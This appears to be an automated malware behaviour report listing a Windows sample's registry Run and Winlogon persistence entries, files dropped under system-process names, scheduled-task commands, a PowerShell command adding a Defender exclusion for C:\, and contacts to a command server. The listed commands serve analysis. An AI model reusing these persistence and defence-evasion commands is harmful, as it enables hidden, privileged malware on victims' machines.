Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'audiodg' = '"%ALLUSERSPROFILE%\Documents\audiodg.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'taskhost' = '"C:\totalcmd\LANGUAGE\taskhost.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'spoolsv' = '"%WINDIR%\security\templates\spoolsv.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'spoolsv' = '"%WINDIR%\security\templates\spoolsv.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '<File name>' = '"%WINDIR%\Registration\CRMLog\<File name>.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] '<File name>' = '"%WINDIR%\Registration\CRMLog\<File name>.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'System' = '"%WINDIR%\Speech\System.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'System' = '"%WINDIR%\Speech\System.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\explorer.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'explorer' = '"C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\explorer.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"<Current directory>\iexplore.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'iexplore' = '"<Current directory>\iexplore.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'wininit' = '"%ProgramFiles(x86)%\K-Lite Codec Pack\Filters\LAV\wininit.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'wininit' = '"%ProgramFiles(x86)%\K-Lite Codec Pack\Filters\LAV\wininit.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"C:\totalcmd\LANGUAGE\firefox.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"C:\totalcmd\LANGUAGE\firefox.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"<Current directory>\firefox.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"<Current directory>\firefox.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'taskhost' = '"C:\totalcmd\LANGUAGE\taskhost.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'services' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'Idle' = '"%ProgramFiles%\USDownloader\Idle.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'lsass' = '"%ProgramFiles%\InstallLicense\lsass.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'audiodg' = '"%ALLUSERSPROFILE%\Documents\audiodg.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "%ALLUSERSPROFILE%\Documents\audiodg.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'audiodg' = '"C:\totalcmd\LANGUAGE\audiodg.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'audiodg' = '"C:\totalcmd\LANGUAGE\audiodg.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "%ALLUSERSPROFILE%\Documents\audiodg.exe", "C:\totalcmd\LANGUAGE\audiodg.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"%ProgramFiles(x86)%\Opera\29.0.1795.47\localization\firefox.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'firefox' = '"%ProgramFiles(x86)%\Opera\29.0.1795.47\localization\firefox.exe"'
- [<HKLM>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, "%ALLUSERSPROFILE%\Documents\audiodg.exe", "C:\totalcmd\LANGUAGE\audiodg.exe", "%ProgramFiles(x86)%\Opera...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'csrss' = '"C:\Users\Default User\csrss.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'csrss' = '"C:\Users\Default User\csrss.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'taskhost' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'taskhost' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'mdm' = '"<Current directory>\mdm.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'mdm' = '"<Current directory>\mdm.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'dwm' = '"C:\MSOCache\All Users\dwm.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'dwm' = '"C:\MSOCache\All Users\dwm.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'lsass' = '"%ProgramFiles%\InstallLicense\lsass.exe"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Idle' = '"%ProgramFiles%\USDownloader\Idle.exe"'
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\Run] 'services' = '"C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe"'
- <SYSTEM32>\tasks\audiodga
- <SYSTEM32>\tasks\wininit
- <SYSTEM32>\tasks\wininitw
- <SYSTEM32>\tasks\iexplore
- <SYSTEM32>\tasks\iexplorei
- <SYSTEM32>\tasks\explorer
- <SYSTEM32>\tasks\explorere
- <SYSTEM32>\tasks\system
- <SYSTEM32>\tasks\systems
- <SYSTEM32>\tasks\<File name>
- <SYSTEM32>\tasks\<File name>y
- <SYSTEM32>\tasks\spoolsv
- <SYSTEM32>\tasks\spoolsvs
- <SYSTEM32>\tasks\idle
- <SYSTEM32>\tasks\idlei
- <SYSTEM32>\tasks\lsass
- <SYSTEM32>\tasks\dwm
- <SYSTEM32>\tasks\mdm
- <SYSTEM32>\tasks\lsassl
- <SYSTEM32>\tasks\dwmd
- <SYSTEM32>\tasks\mdmm
- <SYSTEM32>\tasks\taskhost
- <SYSTEM32>\tasks\taskhostt
- <SYSTEM32>\tasks\csrssc
- <SYSTEM32>\tasks\csrss
- <SYSTEM32>\tasks\firefox
- <SYSTEM32>\tasks\firefoxf
- <SYSTEM32>\tasks\audiodg
- <SYSTEM32>\tasks\servicess
- <SYSTEM32>\tasks\services
- <Drive name for removable media>:\375177e9998529a4ee1b8fda529bb931.exe
- User Account Control (UAC)
- %ALLUSERSPROFILE%\documents\audiodg.exe
- %WINDIR%\security\templates\rcxcd35.tmp
- %WINDIR%\security\templates\rcxcc69.tmp
- C:\totalcmd\language\rcxc9aa.tmp
- C:\totalcmd\language\rcxc8cf.tmp
- %ProgramFiles%\usdownloader\rcxc600.tmp
- %ProgramFiles%\usdownloader\rcxc534.tmp
- %ProgramFiles%\installlicense\rcxc275.tmp
- %ProgramFiles%\installlicense\rcxc1b9.tmp
- C:\msocache\all users\rcxbefa.tmp
- C:\msocache\all users\rcxbe2e.tmp
- <Current directory>\rcxbb6f.tmp
- <Current directory>\rcxbab3.tmp
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxb7f4.tmp
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxb738.tmp
- C:\users\default user\rcxb44a.tmp
- C:\users\default user\rcxb38e.tmp
- %ProgramFiles(x86)%\opera\29.0.1795.47\localization\rcxb0cf.tmp
- C:\totalcmd\language\rcxad63.tmp
- %ProgramFiles(x86)%\opera\29.0.1795.47\localization\rcxb013.tmp
- %WINDIR%\registration\crmlog\rcxd013.tmp
- %WINDIR%\registration\crmlog\rcxd0fe.tmp
- %TEMP%\68ee2466-6c78-4e17-a69c-816e60d14ef4.vbs
- nul
- %TEMP%\mzyqimrpz2.bat
- %TEMP%\7czzqib8ja
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxea08.tmp
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxe94c.tmp
- <Current directory>\rcxe67d.tmp
- <Current directory>\rcxe5d1.tmp
- C:\totalcmd\language\rcxe255.tmp
- %ProgramFiles(x86)%\k-lite codec pack\filters\lav\wininit.exe
- %ProgramFiles(x86)%\k-lite codec pack\filters\lav\rcxdfa6.tmp
- %ProgramFiles(x86)%\k-lite codec pack\filters\lav\rcxdeea.tmp
- <Current directory>\rcxdbfc.tmp
- <Current directory>\rcxdb30.tmp
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\rcxd842.tmp
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\rcxd777.tmp
- %WINDIR%\speech\rcxd4b8.tmp
- %WINDIR%\speech\rcxd3bd.tmp
- C:\totalcmd\language\rcxac97.tmp
- %ALLUSERSPROFILE%\documents\rcxa9d8.tmp
- %ALLUSERSPROFILE%\documents\rcxa90d.tmp
- %ProgramFiles%\usdownloader\idle.exe
- %ProgramFiles%\installlicense\6203df4a6bafc7
- %ProgramFiles%\installlicense\lsass.exe
- C:\msocache\all users\6cb0b6c459d5d3
- C:\msocache\all users\dwm.exe
- <Current directory>\559fba5f8e4410
- <Current directory>\mdm.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\b75386f1303e64
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe
- C:\users\default user\886983d96e3d3e
- C:\users\default user\csrss.exe
- %ProgramFiles(x86)%\opera\29.0.1795.47\localization\0fc223bdacedc3
- %ProgramFiles(x86)%\opera\29.0.1795.47\localization\firefox.exe
- C:\totalcmd\language\42af1c969fbb7b
- C:\totalcmd\language\audiodg.exe
- %ALLUSERSPROFILE%\documents\42af1c969fbb7b
- C:\totalcmd\language\taskhost.exe
- C:\totalcmd\language\b75386f1303e64
- %ProgramFiles%\usdownloader\6ccacd8608530f
- %WINDIR%\security\templates\spoolsv.exe
- <Current directory>\rcxa6ca.tmp
- %WINDIR%\security\templates\f3b6ecef712a24
- <Current directory>\rcxa5ff.tmp
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\c5b4cb5e9653cc
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe
- <Current directory>\0fc223bdacedc3
- <Current directory>\firefox.exe
- C:\totalcmd\language\0fc223bdacedc3
- C:\totalcmd\language\firefox.exe
- C:\totalcmd\language\rcxe312.tmp
- %TEMP%\79d5059b88b30b06dcdfbeda672f43c4eecfc883.exe
- <Current directory>\9db6e019d4f04e
- <Current directory>\iexplore.exe
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\7a0fd90576e088
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\explorer.exe
- %WINDIR%\speech\27d1bcfc3c54e0
- %WINDIR%\speech\system.exe
- %WINDIR%\registration\crmlog\dbe264ddc0642a
- %WINDIR%\registration\crmlog\<File name>.exe
- %ProgramFiles(x86)%\k-lite codec pack\filters\lav\56085415360792
- %TEMP%\7b3c3aaa-daf1-4f63-8966-68fa0d146b22.vbs
- <Full path to file>
- <Current directory>\firefox.exe
- C:\totalcmd\language\firefox.exe
- %ProgramFiles(x86)%\k-lite codec pack\filters\lav\wininit.exe
- <Current directory>\iexplore.exe
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\explorer.exe
- %WINDIR%\speech\system.exe
- %WINDIR%\registration\crmlog\<File name>.exe
- %WINDIR%\security\templates\spoolsv.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe
- C:\totalcmd\language\taskhost.exe
- %ProgramFiles%\installlicense\lsass.exe
- C:\msocache\all users\dwm.exe
- <Current directory>\mdm.exe
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe
- C:\users\default user\csrss.exe
- %ProgramFiles(x86)%\opera\29.0.1795.47\localization\firefox.exe
- C:\totalcmd\language\audiodg.exe
- %ALLUSERSPROFILE%\documents\audiodg.exe
- %ProgramFiles%\usdownloader\idle.exe
- <Drive name for removable media>:\375177e9998529a4ee1b8fda529bb931.exe
- %TEMP%\7czzqib8ja
- from <Current directory>\rcxa6ca.tmp to <Full path to file>
- from %WINDIR%\security\templates\rcxcc69.tmp to %WINDIR%\security\templates\spoolsv.exe
- from %WINDIR%\security\templates\rcxcd35.tmp to %WINDIR%\security\templates\spoolsv.exe
- from %WINDIR%\registration\crmlog\rcxd013.tmp to %WINDIR%\registration\crmlog\<File name>.exe
- from %WINDIR%\registration\crmlog\rcxd0fe.tmp to %WINDIR%\registration\crmlog\<File name>.exe
- from %WINDIR%\speech\rcxd3bd.tmp to %WINDIR%\speech\system.exe
- from %WINDIR%\speech\rcxd4b8.tmp to %WINDIR%\speech\system.exe
- from C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\rcxd777.tmp to C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\explorer.exe
- from <Current directory>\rcxdb30.tmp to <Current directory>\iexplore.exe
- from C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxe94c.tmp to C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe
- from <Current directory>\rcxdbfc.tmp to <Current directory>\iexplore.exe
- from %ProgramFiles(x86)%\k-lite codec pack\filters\lav\rcxdeea.tmp to %ProgramFiles(x86)%\k-lite codec pack\filters\lav\wininit.exe
- from %ProgramFiles(x86)%\k-lite codec pack\filters\lav\rcxdfa6.tmp to %ProgramFiles(x86)%\k-lite codec pack\filters\lav\wininit.exe
- from C:\totalcmd\language\rcxe255.tmp to C:\totalcmd\language\firefox.exe
- from C:\totalcmd\language\rcxe312.tmp to C:\totalcmd\language\firefox.exe
- from <Current directory>\rcxe5d1.tmp to <Current directory>\firefox.exe
- from <Current directory>\rcxe67d.tmp to <Current directory>\firefox.exe
- from C:\totalcmd\language\rcxc9aa.tmp to C:\totalcmd\language\taskhost.exe
- from C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\rcxd842.tmp to C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\explorer.exe
- from C:\totalcmd\language\rcxc8cf.tmp to C:\totalcmd\language\taskhost.exe
- from C:\users\default user\rcxb44a.tmp to C:\users\default user\csrss.exe
- from %ALLUSERSPROFILE%\documents\rcxa90d.tmp to %ALLUSERSPROFILE%\documents\audiodg.exe
- from %ALLUSERSPROFILE%\documents\rcxa9d8.tmp to %ALLUSERSPROFILE%\documents\audiodg.exe
- from C:\totalcmd\language\rcxac97.tmp to C:\totalcmd\language\audiodg.exe
- from C:\totalcmd\language\rcxad63.tmp to C:\totalcmd\language\audiodg.exe
- from %ProgramFiles(x86)%\opera\29.0.1795.47\localization\rcxb013.tmp to %ProgramFiles(x86)%\opera\29.0.1795.47\localization\firefox.exe
- from %ProgramFiles(x86)%\opera\29.0.1795.47\localization\rcxb0cf.tmp to %ProgramFiles(x86)%\opera\29.0.1795.47\localization\firefox.exe
- from C:\users\default user\rcxb38e.tmp to C:\users\default user\csrss.exe
- from C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxb738.tmp to C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe
- from %ProgramFiles%\usdownloader\rcxc534.tmp to %ProgramFiles%\usdownloader\idle.exe
- from C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxb7f4.tmp to C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe
- from <Current directory>\rcxbab3.tmp to <Current directory>\mdm.exe
- from <Current directory>\rcxbb6f.tmp to <Current directory>\mdm.exe
- from C:\msocache\all users\rcxbe2e.tmp to C:\msocache\all users\dwm.exe
- from C:\msocache\all users\rcxbefa.tmp to C:\msocache\all users\dwm.exe
- from %ProgramFiles%\installlicense\rcxc1b9.tmp to %ProgramFiles%\installlicense\lsass.exe
- from %ProgramFiles%\installlicense\rcxc275.tmp to %ProgramFiles%\installlicense\lsass.exe
- from %ProgramFiles%\usdownloader\rcxc600.tmp to %ProgramFiles%\usdownloader\idle.exe
- from C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\rcxea08.tmp to C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe
- 'h1#####.srv12.test-hf.su':80
- http://h1#####.srv12.test-hf.su/toGeoUpdateprotect.php?X2########################################################################################################################################...
- http://h1#####.srv12.test-hf.su/toGeoUpdateprotect.php?KP########################################################################################################################################...
- DNS ASK h1#####.srv12.test-hf.su
- 'localhost':123
- '%ALLUSERSPROFILE%\documents\audiodg.exe'
- '<SYSTEM32>\wscript.exe' "%TEMP%\68ee2466-6c78-4e17-a69c-816e60d14ef4.vbs"
- '<SYSTEM32>\wscript.exe' "%TEMP%\7b3c3aaa-daf1-4f63-8966-68fa0d146b22.vbs"
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\MZYQImRpZ2.bat"' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'%ALLUSERSPROFILE%\Documents\audiodg.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "<File name>y" /sc MINUTE /mo 14 /tr "'%WINDIR%\Registration\CRMLog\<File name>.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "<File name>" /sc ONLOGON /tr "'%WINDIR%\Registration\CRMLog\<File name>.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "<File name>y" /sc MINUTE /mo 11 /tr "'%WINDIR%\Registration\CRMLog\<File name>.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'%WINDIR%\Speech\System.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "System" /sc ONLOGON /tr "'%WINDIR%\Speech\System.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'%WINDIR%\Speech\System.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\explorer.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 13 /tr "'<Current directory>\iexplore.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "iexplore" /sc ONLOGON /tr "'<Current directory>\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsv" /sc ONLOGON /tr "'%WINDIR%\security\templates\spoolsv.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'%WINDIR%\security\templates\spoolsv.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "iexplorei" /sc MINUTE /mo 11 /tr "'<Current directory>\iexplore.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'%ProgramFiles(x86)%\K-Lite Codec Pack\Filters\LAV\wininit.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 6 /tr "'C:\totalcmd\LANGUAGE\firefox.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefox" /sc ONLOGON /tr "'C:\totalcmd\LANGUAGE\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 13 /tr "'C:\totalcmd\LANGUAGE\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 12 /tr "'<Current directory>\firefox.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefox" /sc ONLOGON /tr "'<Current directory>\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 11 /tr "'<Current directory>\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\services.exe'" /rl HIGHEST /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\'
- '<SYSTEM32>\schtasks.exe' /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'%ProgramFiles(x86)%\K-Lite Codec Pack\Filters\LAV\wininit.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "wininit" /sc ONLOGON /tr "'%ProgramFiles(x86)%\K-Lite Codec Pack\Filters\LAV\wininit.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'%WINDIR%\security\templates\spoolsv.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\totalcmd\LANGUAGE\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhost" /sc ONLOGON /tr "'C:\totalcmd\LANGUAGE\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'%ALLUSERSPROFILE%\Documents\audiodg.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\totalcmd\LANGUAGE\audiodg.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodg" /sc ONLOGON /tr "'C:\totalcmd\LANGUAGE\audiodg.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\totalcmd\LANGUAGE\audiodg.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 6 /tr "'%ProgramFiles(x86)%\Opera\29.0.1795.47\localization\firefox.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefox" /sc ONLOGON /tr "'%ProgramFiles(x86)%\Opera\29.0.1795.47\localization\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "firefoxf" /sc MINUTE /mo 12 /tr "'%ProgramFiles(x86)%\Opera\29.0.1795.47\localization\firefox.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\csrss.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "audiodg" /sc ONLOGON /tr "'%ALLUSERSPROFILE%\Documents\audiodg.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\taskhost.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "mdm" /sc ONLOGON /tr "'<Current directory>\mdm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "mdmm" /sc MINUTE /mo 6 /tr "'<Current directory>\mdm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\dwm.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'%ProgramFiles%\InstallLicense\lsass.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsass" /sc ONLOGON /tr "'%ProgramFiles%\InstallLicense\lsass.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'%ProgramFiles%\InstallLicense\lsass.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'%ProgramFiles%\USDownloader\Idle.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "Idle" /sc ONLOGON /tr "'%ProgramFiles%\USDownloader\Idle.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'%ProgramFiles%\USDownloader\Idle.exe'" /rl HIGHEST /f
- '<SYSTEM32>\schtasks.exe' /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\totalcmd\LANGUAGE\taskhost.exe'" /f
- '<SYSTEM32>\schtasks.exe' /create /tn "mdmm" /sc MINUTE /mo 13 /tr "'<Current directory>\mdm.exe'" /f
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\MZYQImRpZ2.bat"
- '<SYSTEM32>\w32tm.exe' /stripchart /computer:localhost /period:5 /dataonly /samples:2